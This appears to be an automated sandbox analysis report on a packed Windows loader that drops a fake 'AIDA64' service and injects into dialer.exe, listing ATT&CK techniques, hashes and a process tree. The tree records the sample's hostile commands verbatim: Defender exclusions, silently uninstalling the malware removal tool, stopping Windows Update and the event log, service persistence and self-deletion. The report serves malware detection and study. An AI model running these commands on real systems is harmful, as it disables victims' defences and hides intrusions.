18aca5c964d48dc9d8cdcd4a4a7a4be5fba19f72c5aa94d2090e84dbad4ea38b

Analysis

max time kernel
29s
max time network
123s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
27/04/2024, 03:14

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Loader.exe
Size

667.6MB
MD5

7cc20058012097efa4abde90287e38f4
SHA1

82f54527ff8cd2695dc391f39978dee0192b3080
SHA256

18aca5c964d48dc9d8cdcd4a4a7a4be5fba19f72c5aa94d2090e84dbad4ea38b
SHA512

c208d3e6fc5a0fb3b10cc8ebd69976bda8e3b2cb49debd425b1b19e49afd78795772c1c085dbd8f2e5836340bcf9ee2ef941d99e114bec7726062178a6dcd856
SSDEEP

196608:kpHkUgQgnjoklXR4R4rwEH5OTSFG+OIvcW/rBXBFIoioPPPEdAL6M6:kpHkUAckl6qPHcSBXBFOAUdk6P

Score

9^/10

evasion persistence themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	aida64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	RA5ftxMmABtT9PhOTUVi.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AIDA64\ImagePath = "C:\\ProgramData\\AIDA64\\aida64.exe"	services.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RA5ftxMmABtT9PhOTUVi.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RA5ftxMmABtT9PhOTUVi.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aida64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aida64.exe

Executes dropped EXE 3 IoCs

pid	Process
3044	RA5ftxMmABtT9PhOTUVi.exe
2608	Y1TIHdrjxCJ6NsoGpldc.exe
2964	aida64.exe

Loads dropped DLL 10 IoCs

pid	Process
1700	Loader.exe
1700	Loader.exe
1700	Loader.exe
1700	Loader.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
480	services.exe
480	services.exe

Themida packer 15 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000e00000001342e-1.dat	themida
behavioral1/files/0x000e00000001342e-2.dat	themida
behavioral1/files/0x000e00000001342e-6.dat	themida
behavioral1/memory/3044-8-0x000000013F750000-0x00000001409E7000-memory.dmp	themida
behavioral1/memory/3044-11-0x000000013F750000-0x00000001409E7000-memory.dmp	themida
behavioral1/memory/3044-19-0x000000013F750000-0x00000001409E7000-memory.dmp	themida
behavioral1/memory/3044-18-0x000000013F750000-0x00000001409E7000-memory.dmp	themida
behavioral1/memory/3044-25-0x000000013F750000-0x00000001409E7000-memory.dmp	themida
behavioral1/files/0x000e00000001342e-190.dat	themida
behavioral1/files/0x0008000000014b1c-192.dat	themida
behavioral1/memory/3044-194-0x000000013F750000-0x00000001409E7000-memory.dmp	themida
behavioral1/files/0x0008000000014b1c-197.dat	themida
behavioral1/files/0x0008000000014b1c-198.dat	themida
behavioral1/files/0x0008000000014b1c-203.dat	themida
behavioral1/files/0x0008000000014b1c-196.dat	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RA5ftxMmABtT9PhOTUVi.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aida64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
4	pastebin.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	RA5ftxMmABtT9PhOTUVi.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3044 set thread context of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2376	sc.exe
2548	sc.exe
1800	sc.exe
1632	sc.exe
2888	sc.exe
2332	sc.exe
1364	sc.exe
1484	sc.exe
2656	sc.exe
3036	sc.exe
944	sc.exe
2864	sc.exe
2040	sc.exe
352	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1208	2608	WerFault.exe	29

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e04d4f4e5198da01	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3044	RA5ftxMmABtT9PhOTUVi.exe
2688	powershell.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
3044	RA5ftxMmABtT9PhOTUVi.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
2628	dialer.exe
3044	RA5ftxMmABtT9PhOTUVi.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	3044	RA5ftxMmABtT9PhOTUVi.exe
Token: SeDebugPrivilege	2628	dialer.exe
Token: SeShutdownPrivilege	1136	Explorer.EXE
Token: SeAuditPrivilege	860	svchost.exe
Token: SeDebugPrivilege	1652	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 1700 wrote to memory of 3044	1700	Loader.exe	28
PID 1700 wrote to memory of 3044	1700	Loader.exe	28
PID 1700 wrote to memory of 3044	1700	Loader.exe	28
PID 1700 wrote to memory of 3044	1700	Loader.exe	28
PID 1700 wrote to memory of 2608	1700	Loader.exe	29
PID 1700 wrote to memory of 2608	1700	Loader.exe	29
PID 1700 wrote to memory of 2608	1700	Loader.exe	29
PID 1700 wrote to memory of 2608	1700	Loader.exe	29
PID 2608 wrote to memory of 1208	2608	Y1TIHdrjxCJ6NsoGpldc.exe	30
PID 2608 wrote to memory of 1208	2608	Y1TIHdrjxCJ6NsoGpldc.exe	30
PID 2608 wrote to memory of 1208	2608	Y1TIHdrjxCJ6NsoGpldc.exe	30
PID 2608 wrote to memory of 1208	2608	Y1TIHdrjxCJ6NsoGpldc.exe	30
PID 2380 wrote to memory of 2868	2380	cmd.exe	39
PID 2380 wrote to memory of 2868	2380	cmd.exe	39
PID 2380 wrote to memory of 2868	2380	cmd.exe	39
PID 3044 wrote to memory of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46
PID 3044 wrote to memory of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46
PID 3044 wrote to memory of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46
PID 3044 wrote to memory of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46
PID 3044 wrote to memory of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46
PID 3044 wrote to memory of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46
PID 3044 wrote to memory of 2628	3044	RA5ftxMmABtT9PhOTUVi.exe	46
PID 2628 wrote to memory of 432	2628	dialer.exe	5
PID 2628 wrote to memory of 480	2628	dialer.exe	6
PID 2628 wrote to memory of 488	2628	dialer.exe	7
PID 2628 wrote to memory of 496	2628	dialer.exe	8
PID 2628 wrote to memory of 592	2628	dialer.exe	9
PID 2628 wrote to memory of 672	2628	dialer.exe	10
PID 2628 wrote to memory of 760	2628	dialer.exe	11
PID 2628 wrote to memory of 812	2628	dialer.exe	12
PID 2628 wrote to memory of 860	2628	dialer.exe	13
PID 2628 wrote to memory of 964	2628	dialer.exe	15
PID 2628 wrote to memory of 272	2628	dialer.exe	16
PID 2628 wrote to memory of 1052	2628	dialer.exe	17
PID 2628 wrote to memory of 1076	2628	dialer.exe	18
PID 2628 wrote to memory of 1084	2628	dialer.exe	19
PID 2628 wrote to memory of 1136	2628	dialer.exe	20
PID 2628 wrote to memory of 1164	2628	dialer.exe	21
PID 2628 wrote to memory of 2116	2628	dialer.exe	24
PID 2628 wrote to memory of 2276	2628	dialer.exe	25
PID 2628 wrote to memory of 3044	2628	dialer.exe	28
PID 2628 wrote to memory of 1632	2628	dialer.exe	49
PID 2628 wrote to memory of 1568	2628	dialer.exe	50
PID 480 wrote to memory of 2964	480	services.exe	58
PID 480 wrote to memory of 2964	480	services.exe	58
PID 480 wrote to memory of 2964	480	services.exe	58
PID 2628 wrote to memory of 2964	2628	dialer.exe	58
PID 2996 wrote to memory of 2284	2996	cmd.exe	57
PID 2996 wrote to memory of 2284	2996	cmd.exe	57
PID 2996 wrote to memory of 2284	2996	cmd.exe	57
PID 2628 wrote to memory of 3036	2628	dialer.exe	52
PID 2628 wrote to memory of 2996	2628	dialer.exe	53
PID 2628 wrote to memory of 284	2628	dialer.exe	54
PID 2628 wrote to memory of 1740	2628	dialer.exe	56
PID 2628 wrote to memory of 2284	2628	dialer.exe	57
PID 2628 wrote to memory of 2964	2628	dialer.exe	58
PID 2628 wrote to memory of 1652	2628	dialer.exe	59
PID 2628 wrote to memory of 2512	2628	dialer.exe	60

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Drops file in System32 directory
  PID:760
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1052
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:860
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:964
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:272
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1076
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1084
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1164
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2116
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2276
- C:\ProgramData\AIDA64\aida64.exe
  C:\ProgramData\AIDA64\aida64.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:2964
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2392
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2332
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2864
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2040
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:352
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1484
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2656
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:840
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2204
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    PID:2188

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Users\Admin\AppData\Roaming\RA5ftxMmABtT9PhOTUVi.exe
    C:\Users\Admin\AppData\Roaming\RA5ftxMmABtT9PhOTUVi.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2380
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2868
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2376
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2548
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2332
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2888
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:1364
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2628
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "AIDA64"
      4⤵
      Launches sc.exe
      PID:1800
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "AIDA64" binpath= "C:\ProgramData\AIDA64\aida64.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1632
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:944
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "AIDA64"
      4⤵
      Launches sc.exe
      PID:3036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\RA5ftxMmABtT9PhOTUVi.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2996
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2284
- - C:\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe
    C:\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 116
      4⤵
      Loads dropped DLL
      Program crash
      PID:1208

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1823294257721088481110755413-2270522339892364961418995376-343775869684260104"
1⤵
PID:1568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1900087904-33464277512317972691047522172172622533-1636920323-1173162423-799427136"
1⤵
PID:284

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2440479192026829681-1090185534-1778294217-16958383681034898228-10994670322119902155"
1⤵
PID:1740

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1800799068-2078554460689771337165959929-607078103-3123220761360535862-891622239"
1⤵
PID:2512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\AIDA64\aida64.exe

Filesize
222.6MB

MD5
46ed9b3b66b2e3b14a690a3c2be5ec11

SHA1
d16dea2c7c1f1f1444b43a96e435bc095ff8579d

SHA256
a6647d8bda49eb07ea8bfd246d79814a008977abd248bc4c6714f962beda0547

SHA512
d897b1280a2249bc84d58cd99abb4ff5cf975ee0a75273e243e5edf81e4eeb66c7dfe193af58fe5270eb543852715e216113055558e79a595c3ac7cab0a9ea28

Download Submit
C:\ProgramData\AIDA64\aida64.exe

Filesize
220.5MB

MD5
72bd3938571de275a9c10d9630480272

SHA1
f1305de542e859be1a489b6f5148d58fb8244cb5

SHA256
7755a5786d3c8bacf8d779da109760fe0923ad731306d62d50d5601f1ea0d771

SHA512
a712c8884613f60b324fbda5f4ac925767b32be76994a2b0eacadece0ae3ea82edf85dddb45f9a799cafe4bb2cf7d6c2e17981df1e8e03ea8bc05207053a9632

Download Submit
C:\ProgramData\AIDA64\aida64.exe

Filesize
221.1MB

MD5
1448c98d71d54ae6c324a8a6b460af72

SHA1
968e1018915954894d0ff66375c106570f7afaae

SHA256
5a6145cce3552588d1c5ed52d3d5d08865f83daa26919089996723a3843cad57

SHA512
c52c63aba6769d4554b5fbbbcd66f75d90ca93e9f2b42ed9a1c622e393aee6265443e5ce6b8841d406bd3a3ad43ea6ba490ea9b018fac7050380d846e3e85662

Download Submit
C:\Users\Admin\AppData\Roaming\RA5ftxMmABtT9PhOTUVi.exe

Filesize
224.9MB

MD5
dd38c5a6ae5f7cc2b9ef639cca7abf9e

SHA1
e9896c9543e1471313c7758980bf6ac5e92b0346

SHA256
30746d1a6fe02b083fb4b5c11f5f43a1863d1faa1ef0d7a227217c014797653c

SHA512
a80304bbe513ead6dc315cd614610d250c614935e4dcfc34446bb71e2a4b158e6f36f69745fc6a2ae194bac666fc4d4dc795d7671d7850ab37ec8000f0787a18

Download Submit
C:\Users\Admin\AppData\Roaming\RA5ftxMmABtT9PhOTUVi.exe

Filesize
278.8MB

MD5
ecf125a2320c38d31dd18dd367d6795c

SHA1
7f4c5d510ef8e108d77294cb921e1aab24a5e0e8

SHA256
756933cc7473ceff9226fab0f10bd658d8b0924ea240f38b1d9e516c234c4d32

SHA512
a36b0e32a0d28113d837d6af7f467d9b1c8b3ca6027031e74ad4ba92791589e63e2c08b98e8462a023dea16c6bbb744700aef0ad2d0cda7f80e923a10fad62a1

Download Submit
C:\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe

Filesize
266.1MB

MD5
74dc12e340ecf7328c2a955a59c0c42d

SHA1
614357820de3e85ed3c6575a40c52e1f91ebe979

SHA256
0603aadff2a56226c7887c8a8f40de49a324157aeaf079241ef4f242b9888002

SHA512
0ea1d03a04b1ab69ba6618f636d8395a582511b624b5e06011edba3a14457807896ba9e22668ae3d0bf8f5d68f2e7ef483e23e4cb5b3dd29fea464565825e527

Download Submit
C:\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe

Filesize
263.8MB

MD5
edfcfa0f077e344e88205acfec40b5bd

SHA1
b8504f70355efc56a27ace140142a63a901c85f1

SHA256
5e3d2cc8769c28cf54dbbed841dcfd99ff862577b926924a238d406065455f0c

SHA512
f72f08e0d6ba4b6d275d2d6e52555956813f5a8d41f1d69cd99571e15bc585b3587f2bb0467f540d09cbb4d101642da5b7566140c60693888b2eea018d71331b

Download Submit
\ProgramData\AIDA64\aida64.exe

Filesize
220.4MB

MD5
e0fece4416ee48f11946ca7667c03e51

SHA1
f28fb92333c62c04eaf0517771e8b395039d9c5e

SHA256
6da5fc5e9106dae52d59dca98b52d352d5b11840843104f4a3dd041c8b31fd27

SHA512
5766b821d493b95b21df3269553920ec2a9d6a742b1f743d4c24717c450108c425e73cc6b2b360de11889449435b00f321bd00808dd0d5f896d680f36a9ac359

Download Submit
\ProgramData\AIDA64\aida64.exe

Filesize
223.2MB

MD5
8ced00d268d4450c086e4d99cb925ca0

SHA1
367ab0d27ed815c5a1e93eea18c22b775a89dd0c

SHA256
02fb938de3ae41917b7adddae3a6b29771f7888c57e2af968a4b64275b835154

SHA512
5287b2d359e3cf49bfee2a3f877f9fed6227bd36d608af62fc97befc93a8f419481aba4db312e1e2c2a6f8bee826b2b4e2cc354df67b46aca2f5430a62fc7334

Download Submit
\Users\Admin\AppData\Roaming\RA5ftxMmABtT9PhOTUVi.exe

Filesize
228.4MB

MD5
53ab127a37b7a9c1500e769a48168e49

SHA1
fe77ca4a85d9f62f27209e18bdd10628dd408666

SHA256
dd816cfe5ab3862cb256a66253e3cdae939fb03b6699a26f574a04c7fbc644d2

SHA512
a9bc42db219a7f07dfa0a1adf8de4ecd460937be109bb9f130d7289a61905ee5d620a4352bc6989f88999b71b6d0c9a0ac9a775361bae9ec86a8dcf99bfad6d4

Download Submit
\Users\Admin\AppData\Roaming\RA5ftxMmABtT9PhOTUVi.exe

Filesize
264.6MB

MD5
aa32ade5f41b2da0628b831c09c61e18

SHA1
c73a95da640cb3e2de216c2ee1e20af3ecc63f76

SHA256
2f886bcd37140fcd503b96b46f3a0581878921a8f0d06e41f9562535650a36dd

SHA512
9455a9f87afcb1fbce46e82782abe9f7e711e1c210be0803d563fbbf183b47707bc6ccf01e705b8ac9170436aeb1c1e20f678c66eb4adf767e05cb3b585c8bc5

Download Submit
\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe

Filesize
269.9MB

MD5
9490fa6ea2c95d2337e84c95e34b43fe

SHA1
8aa97da255b3482690d97e2e5b2fdb6b750422d6

SHA256
c03d3b151154cffa5946181d6191dfe7f65d6e8dd695ed482bce1a9d91d8d73c

SHA512
051dccb05959fbe497407442a68738363229c8cc3c761d9313032a1086f3b253c9d6251a17180c1cb5a51d08631c5438c54efbb749c6e0e8a77841af482925b9

Download Submit
\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe

Filesize
266.9MB

MD5
250a20d2fec45b50f6d92df10ee87481

SHA1
80ed9302aaa741c292e9d988e7264e503f031613

SHA256
899b08eab4b06417c3fea24b28cea192815e6be0c1f7eff60f9dc3c38b1d01c5

SHA512
8db5600762afe181a615212b1938986099abb27889f3e0c867f6beae8c7f055197fd28dc75a51a6ca68b2b364e3f720e8126d2194ad0a62af3df561da76dce6d

Download Submit
\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe

Filesize
262.8MB

MD5
399845792b03cab4c12f3f9e57b2c16e

SHA1
1cb268e9ac50fd0b52eceea36ba1468e4d10a03b

SHA256
55f4b8779ff6a3b7baea74f3140270c1408cd264f7da9724f7b1dc41215d370c

SHA512
d86d996bc1bb47ebd8559b0dbb04e2c347e5ffec6143687d55bfdc6f8e70799717f353e5442d24c9942da9fb8bbfd8789cd2b59b0e4ce6d991ea28f9a83fac60

Download Submit
\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe

Filesize
270.5MB

MD5
9fa1c9d6d54cbdb6476ef72c08426d2d

SHA1
1f57b7f750d8cc38fabef2afd4ca339a55960f8e

SHA256
a2eab3f9fd8ad99c1c20740f95e3c95aad241dc84a72e0c7a432312a1dd5de42

SHA512
16b0c49926d4d3c115063bf204879df0226ecfbb2d40808068130dc396c907e8466911ed36a88af0f4a5dbd31b349b4a4261fb9b9e1a6bc6f9f3147e79fd41d8

Download Submit
\Users\Admin\AppData\Roaming\Y1TIHdrjxCJ6NsoGpldc.exe

Filesize
267.6MB

MD5
b120bd613b1eca497b9f199e27d14dec

SHA1
24a188a2512d06aaa00364c81e59ace688abd70a

SHA256
3a1871f796d8596b34da58e433430d9991b558dfd952a86a3b32e7c6b2853fe5

SHA512
c3767662674bb7e24b1f35457db467cbc8fb5c36e1e545c77a17b4a502e22766b08bd609bf0b3680258e832298951e588ebad6491077e1155b4b660a3a24dc1e

Download Submit
memory/432-45-0x0000000000C00000-0x0000000000C24000-memory.dmp

Filesize
144KB

Download
memory/432-43-0x0000000000C00000-0x0000000000C24000-memory.dmp

Filesize
144KB

Download
memory/432-78-0x0000000000C30000-0x0000000000C5B000-memory.dmp

Filesize
172KB

Download
memory/432-81-0x000007FEBED20000-0x000007FEBED30000-memory.dmp

Filesize
64KB

Download
memory/432-82-0x0000000036F70000-0x0000000036F80000-memory.dmp

Filesize
64KB

Download
memory/480-76-0x0000000000E40000-0x0000000000E6B000-memory.dmp

Filesize
172KB

Download
memory/480-614-0x000000013F6D0000-0x0000000140967000-memory.dmp

Filesize
18.6MB

Download
